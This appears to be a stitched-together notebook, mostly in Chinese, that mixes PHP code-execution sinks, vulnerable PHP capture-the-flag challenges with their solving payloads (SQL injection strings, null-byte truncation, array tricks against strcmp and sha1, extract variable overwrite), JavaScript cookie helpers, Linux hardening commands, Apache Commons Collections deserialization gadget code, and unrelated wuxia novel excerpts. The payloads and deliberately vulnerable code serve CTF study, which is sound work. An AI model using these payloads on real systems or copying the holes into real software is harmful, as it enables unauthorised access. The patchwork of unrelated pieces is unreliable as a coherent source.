<?php
echo `dir`;
?>

<?php
include($_GET['a']);
?>

<?php
echo $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\\1', $var);
?>

<?
preg_replace("/test/e",$_GET['h'],"jutst test");
?>

<?
preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET['h']);
?>

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>

<pre lang="php" file="demo42.php" colla="+">
<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>

<pre lang="php" file="demo51.php" colla="+">
<?php
$foobar = 'system';
ob_start($foobar);
echo 'dir';
ob_end_flush();
?>

<pre lang="php" file="demo52.php" colla="+">
<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>
</pre>

<pre lang="php" file="demo53.php" colla="+">
<?php
class Example {
var $var = '';
function __destruct() {
eval($this->var);
}
}
unserialize($_GET['saved_code']);
?>
</pre>

array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()

<script language="JavaScript" type="text/JavaScript">
<!--
document.cookie="userId=828";
document.cookie="userName=hulk";
var strcookie=document.cookie;
alert(strcookie);
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
//设置两个cookie
document.cookie="userId=828";
document.cookie="userName=hulk";
//获取cookie字符串
var strcookie=document.cookie;
//将多cookie切割为多个名/值对
var arrcookie=strcookie.split("; ");
var userId;
//遍历cookie数组，处理每个cookie对
for(var i=0;i<arrcookie.length;i++){
      var arr=arrcookie[i].split("=");
      //找到名称为userId的cookie，并返回它的值
      if("userId"==arr[0]){
             userId=arr[1];
             break;
      }
}
alert(userId);
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
//获取当前时间
var date=new Date();
var expireDays=10;
//将date设置为10天以后的时间
date.setTime(date.getTime()+expireDays*24*3600*1000);
//将userId和userName两个cookie设置为10天后过期
document.cookie="userId=828; userName=hulk; expire="+date.toGMTString();
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
//获取当前时间
var date=new Date();
//将date设置为过去的时间
date.setTime(date.getTime()-10000);
//将userId这个cookie删除
document.cookie="userId=828; expire="+date.toGMTString();
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function addcookie(name,value,expireHours){
      var cookieString=name+"="+escape(value);
      //判断是否设置过期时间
      if(expireHours>0){
             var date=new Date();
             date.setTime(date.getTime+expireHours*3600*1000);
             cookieString=cookieString+"; expire="+date.toGMTString();
      }
      document.cookie=cookieString;
}
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function getcookie(name){
      var strcookie=document.cookie;
      var arrcookie=strcookie.split("; ");
      for(var i=0;i<arrcookie.length;i++){
            var arr=arrcookie[i].split("=");
            if(arr[0]==name)return arr[1];
      }
      return "";
}
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function deletecookie(name){
       var date=new Date();
       date.setTime(date.getTime()-10000);
       document.cookie=name+"=v; expire="+date.toGMTString();
}
//-->
</script> 

<script language="JavaScript" type="text/JavaScript">
function SetCookie(name,value)//两个参数，一个是cookie的名子，一个是值
{
    var Days = 30; //此 cookie 将被保存 30 天
    var exp  = new Date();    //new Date("December 31, 9998");
    exp.setTime(exp.getTime() + Days*24*60*60*1000);
    document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
function getCookie(name)//取cookies函数       
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
     if(arr != null) return unescape(arr[2]); return null;

}
function delCookie(name)//删除cookie
{
    var exp = new Date();
    exp.setTime(exp.getTime() - 1);
    var cval=getCookie(name);
    if(cval!=null) document.cookie= name + "="+cval+";expires="+exp.toGMTString();
}

SetCookie ("xiaoqi", "3")
alert(getCookie('xiaoqi'));
</script>

<?php


$info = ""; 
$req = [];
$flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

ini_set("display_error", false); 
error_reporting(0); 

if(!isset($_GET['number'])){
   header("hint:26966dc52e85af40f59b4fe73d8c323a.txt");

   die("have a fun!!");

}

foreach([$_GET, $_POST] as $global_var) { 
    foreach($global_var as $key => $value) { 
        $value = trim($value); 
        is_string($value) && $req[$key] = addslashes($value); 
    } 
} 


function is_palindrome_number($number) { 
    $number = strval($number); 
    $i = 0; 
    $j = strlen($number) - 1; 
    while($i < $j) { 
        if($number[$i] !== $number[$j]) { 
            return false; 
        } 
        $i++; 
        $j--; 
    } 
    return true; 
} 


if(is_numeric($_REQUEST['number']))
{

   $info="sorry, you cann't input a number!";

}
elseif($req['number']!=strval(intval($req['number'])))
{

     $info = "number must be equal to it's integer!! ";  

}
else
{

     $value1 = intval($req["number"]);
     $value2 = intval(strrev($req["number"]));  

     if($value1!=$value2){
          $info="no, this is not a palindrome number!";
     }
     else
     {

          if(is_palindrome_number($req["number"])){
              $info = "nice! {$value1} is a palindrome number!"; 
          }
          else
          {
             $info=$flag;
          }
     }

}

echo $info;

<?php
    include 'common.php';
    $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
    //把一个或多个数组合并为一个数组
    class db
    {
        public $where;
        function __wakeup()
        {
            if(!empty($this->where))
            {
                $this->select($this->where);
            }
        }
        function select($where)
        {
            $sql = mysql_query('select * from user where '.$where);
            //函数执行一条 MySQL 查询。
            return @mysql_fetch_array($sql);
            //从结果集中取得一行作为关联数组，或数字数组，或二者兼有返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false
        }
    }

    if(isset($requset['token']))
    //测试变量是否已经配置。若变量已存在则返回 true 值。其它情形返回 false 值。
    {
        $login = unserialize(gzuncompress(base64_decode($requset['token'])));
        //gzuncompress:进行字符串压缩
        //unserialize: 将已序列化的字符串还原回 PHP 的值

        $db = new db();
        $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
        //mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

        if($login['user'] === 'ichunqiu')
        {
            echo $flag;
        }else if($row['pass'] !== $login['pass']){
            echo 'unserialize injection!!';
        }else{
            echo "(╯‵□′)╯︵┴─┴ ";
        }
    }else{
        header('Location: index.php?error=1');
    }

?> 

<?php
$arr = array('user' => 'ichunqiu');
$a = base64_encode(gzcompress(serialize($arr)));
echo $a;
?>

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){

//检测变量是否是数组

        $StrValue=implode($StrValue);

//返回由数组元素组合成的字符串

    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   

//匹配成功一次后就会停止匹配

        print "水可载舟，亦可赛艇！";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 

//遍历数组

    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);

//设置活动的 MySQL 数据库

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 

//执行一条 MySQL 查询

if (mysql_num_rows($query) == 1) { 

//返回结果集中行的数目

    $key = mysql_fetch_array($query);

//返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false

    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
    print "一颗赛艇！";
}
mysql_close($con);
?>

admin' GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1-- -

$flag='xxx'; 
extract($_GET);
 if(isset($shiyan))
 { 
    $content=trim(file_get_contents($flag));
    if($shiyan==$content)
    { 
        echo'ctf{xxx}'; 
    }
   else
   { 
    echo'Oh.no';
   } 
   }

变量覆盖漏洞
PHP extract() 函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素，键名用于变量名，键值用于变量值。

file_get_contents：远程获取获取文件，若没有则为空

构造shiyan=&flag=1

<?php 
if (isset ($_GET['password'])) 
{
  if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
  {
    echo '<p>You password must be alphanumeric</p>';
  }
  else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
   {
     if (strpos ($_GET['password'], '*-*') !== FALSE) 
      {
      die('Flag: ' . $flag);
      }
      else
      {
        echo('<p>*-* have not been found</p>'); 
       }
      }
     else 
     {
        echo '<p>Invalid password</p>'; 
      }
   } 
?>

ereg漏洞
payload：1e9%00*-*
正则%00截断

if (isset($_GET['a'])) {  
    if (strcmp($_GET['a'], $flag) == 0) 
    //比较两个字符串（区分大小写） 
        die('Flag: '.$flag);  
    else  
        print '离成功更近一步了';  
}

payload:?a[]=1

在5.3的版本之后使用strcmp函数比较会返回0

<?php
if (isset($_GET['name']) and isset($_GET['password'])) 
{
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
      die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else
    echo '<p>Login first!</p>';
?>

===会比较类型，比如bool。
sha1()函数和md5()函数存在着漏洞，sha1()函数默认的传入参数类型是字符串型，那要是给它传入数组呢会出现错误，使sha1()函数返回错误，也就是返回false，这样一来===运算符就可以发挥作用了，需要构造username和password既不相等，又同样是数组类型
?name[]=a&password[]=b

<?php
session_start(); 
if (isset ($_GET['password'])) {
    if ($_GET['password'] == $_SESSION['password'])
        die ('Flag: '.$flag);
    else
        print '<p>Wrong guess.</p>';
}
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

抓包删掉cookie中的session即可

<?php


if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********, "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];

  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

//如果 str1 小于 str2 返回 < 0； 如果 str1 大于 str2 返回 > 0；如果两者相等，返回 0。


    echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");

  }
}
?>

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>

<?php


if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("*******", "****", "****");
    mysql_select_db("****") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  if($row['user']=="admin") {
    echo "<p>Logged in! Key: *********** </p>";
  }

  if($row['user'] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}

?>

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误！你的IP不在访问列表之内！";
}
?>

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

<?php
if($_GET[id]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>

if (isset ($_GET['nctf'])) {
    if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
        echo '必须输入数字才行';
    else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
        die('Flag: '.$flag);
    else
        echo '骚年，继续努力吧啊~';
}

#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;

$query='SELECT * FROM users WHERE name=\''admin\'\' AND pass=\''or 1 #'\';';

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user=' $user '"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {

    //strcasecmp:0 - 如果两个字符串相等

      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

payload:user=admin' and 0=1 union select '47bce5c74f589f4867dbd57e9ca9f808' #&pass=aaa

cat /etc/passwd
    注册名：口令：用户标识号：组标识号：用户名：用户主目录：命令解释程序 
    查看是否存在空口令用户（X为存在密码，*为被封禁）
passwd 空口令用户名

vim /etc/login.defs 
查看PASS_MIN_LEN选项值
PASS_MIN_LEN  8
设置密码长度最短为8

vim /etc/login.defs 
PASS_MAX_DAYS 90
PASS_MIN_DAYS 0
设置帐户口令的生存期不长于90 天

vim /etc/login.defs
PASS_WARN_AGE 7
口令到期前多少天开始通知用户口令即将到期

vim /etc/ssh/sshd_config
把PermitRootLogin yes修改为no
service sshd restart
重启sshd服务
如果遇到sshd: unrecognized service错误
尝试一下service ssh restart
用ps -ef | grep sshd查看一下服务是否启动

cat /etc/passwd
useradd username
passwd password
增加新用户
chmod 777 目录

cat /etc/passwd
cat /etc/shadow
删除不需要的账户
userdel username
groupdel username

设置shell
usermod -s /dev/hull username

禁止某用户登陆
example：
bin:x:2:2:bin:/bin:/bin/bash
=>
bin:x:2:2:bin:/bin:/bin/nologin
禁用bin用户登陆

touch /etc/nologin
禁止除root以外所有用户登陆
建议禁掉的用户：daemon   bin  sys  adm  lp   uucp   nuucp  smmsp等

关键目录：
chmod 644 /etc/passwd 
chmod 600 /etc/shadow 
chmod 644 /etc/group

ls -l查看权限
权限前边的ld为d是目录文件,l是链接文件
chmod -R 750 /etc/init.d/*

# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all 开启
# echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all  关闭

> iptables -F   #清空所有的链
> iptables -X  #清空所有自定义的链

> iptables -P INPUT DROP
> iptables -P OUTPUT DROP

iptables -A INPUT -p icmp --icmp-type any -j ACCEPT
允许icmp包进入
iptables -A INPUT -s localhost -d localhost -j ACCEPT
允许本地的数据包
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
允许已经建立和相关的数据包进入
iptables -A OUTPUT -p icmp --icmp any -j ACCEPT
允许icmp包出去
iptables -A OUTPUT -s localhost -d localhost -j ACCEPT
允许本地数据包
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
允许已经建立和相关的数据包出去

iptables -I INPUT -i eth0 -p tcp --dport 81 -j DROP
iptables -I OUTPUT -o eth0 -p tcp --sport 81 -j DROP

iptables -I INPUT -i eth0 -p tcp --dport 81 -j ACCEPT
iptables  -I OUTPUT -o eth0 -p tcp --sport 81 -j ACCEPT

天上白玉京
五楼十二城
仙人抚我顶
结发受长生

白玉京不在天上，在马上

白玉京并不在天上，在马上
他的马鞍已经很陈旧，他的靴子和剑鞘同样陈旧，但他的衣服却是崭新的
他的剑鞘已经敲着马鞍，春风吹在他脸上
他觉得很愉快，很舒服
旧马鞍坐着舒服，旧靴子穿着舒服，旧剑鞘绝不会损伤他的剑锋，新衣服也总是令他觉得精神抖擞，活力充沛

白玉京叹道：“一笑倾人城，再笑倾人国。再锋利的剑，只怕也比不上美人的一笑”

他骄傲、任性，有时冲动得像是个孩子，有时却又深沉的像是条狐狸

重要的是，她就在他身旁，而且永远不会再离开他。这就已够了。 　　

这就是我说的第一个故事，第一种武器。 　　

这故事给我们的教训是一无论多锋利的剑，也比不上那动人的一笑。

所以我说的第一种武器，并不是剑，而是笑，只有笑才能真征服人心。 　　

所以当你懂得这道理，就应该收起你的剑来多笑一笑！

特别是当你心情低沉，对爱情和真诚失去信心的时候，重读读「长生剑」，我知道它不够真实，
但是，当我们读武侠时，岂不本来就是在希冀属于我们的童话？

世上没有任何一种暗器比孔雀翎更可怕，也绝没有任何一种暗器能比孔雀翎更美丽

没有人能形容它的美丽，也没有人能避开它、招架它

小武笑了笑，道：”我虽然不喜欢一个人往陷阱里跳，但若有朋友陪着，随便往哪里跳那就没有关系了

又是黄昏
远山在夕阳中由翠绿变为青灰，泉水流到这里，也渐渐慢了

小武说：“她的外貌也许并不美，可是她的心却很美，也许比世上大多数美人都美丽的多。”

无论多可怕的武器，也比不上人类的信心

武功本就是入世的，只要你肯用心，无论做什么事的时候，都一样可以锻炼你的武功

public interface Transformer {
    /**
     * Transforms the input object (leaving it unchanged) into some output object.
     *
     * @param input  the object to be transformed, should be left unchanged
     * @return a transformed object
     * @throws ClassCastException (runtime) if the input is the wrong class
     * @throws IllegalArgumentException (runtime) if the input is invalid
     * @throws FunctorException (runtime) if the transform cannot be completed
     */
    public Object transform(Object input);

}

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    super();
    iMethodName = methodName;
    iParamTypes = paramTypes;
    iArgs = args;
}

/**
 * Transforms the input to result by invoking a method on the input.
 * 
 * @param input  the input object to transform
 * @return the transformed result, null if null input
 */
public Object transform(Object input) {
    if (input == null) {
        return null;
    }
    try {
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);
            
    } catch (NoSuchMethodException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
    } catch (IllegalAccessException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
    } catch (InvocationTargetException ex) {
        throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
    }
}

/**
   * Constructor that performs no validation.
   * Use <code>getInstance</code> if you want that.
   * 
   * @param constantToReturn  the constant to return each time
   */
  public ConstantTransformer(Object constantToReturn) {
      super();
      iConstant = constantToReturn;
  }

/**
 * Transforms the input by ignoring it and returning the stored constant instead.
 * 
 * @param input  the input object which is ignored
 * @return the stored constant
 */
public Object transform(Object input) {
    return iConstant;
}

/**
     * Constructor that performs no validation.
     * Use <code>getInstance</code> if you want that.
     * 
     * @param transformers  the transformers to chain, not copied, no nulls
     */
    public ChainedTransformer(Transformer[] transformers) {
        super();
        iTransformers = transformers;
    }

    /**
     * Transforms the input to result via each decorated transformer
     * 
     * @param object  the input object passed to the first transformer
     * @return the transformed result
     */
    public Object transform(Object object) {
        for (int i = 0; i < iTransformers.length; i++) {
            object = iTransformers[i].transform(object);
        }
        return object;
    }

/**
 * Override to transform the value when using <code>setValue</code>.
 * 
 * @param value  the value to transform
 * @return the transformed value
 * @since Commons Collections 3.1
 */
protected Object checkSetValue(Object value) {
    return valueTransformer.transform(value);
}

public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}

class AnnotationInvocationHandler implements InvocationHandler, Serializable {
    private final Class<? extends Annotation> type;
    private final Map<String, Object> memberValues;

    AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
        this.type = type;
        this.memberValues = memberValues;
    }

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    s.defaultReadObject();


    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        // Class is no longer an annotation type; all bets are off
        return;
    }

    Map<String, Class<?>> memberTypes = annotationType.memberTypes();

    for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                // 此处触发一些列的Transformer
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                            annotationType.members().get(name)));
            }
        }
    }
}

public Object setValue(Object value) {
    value = parent.checkSetValue(value);
    return entry.setValue(value);
}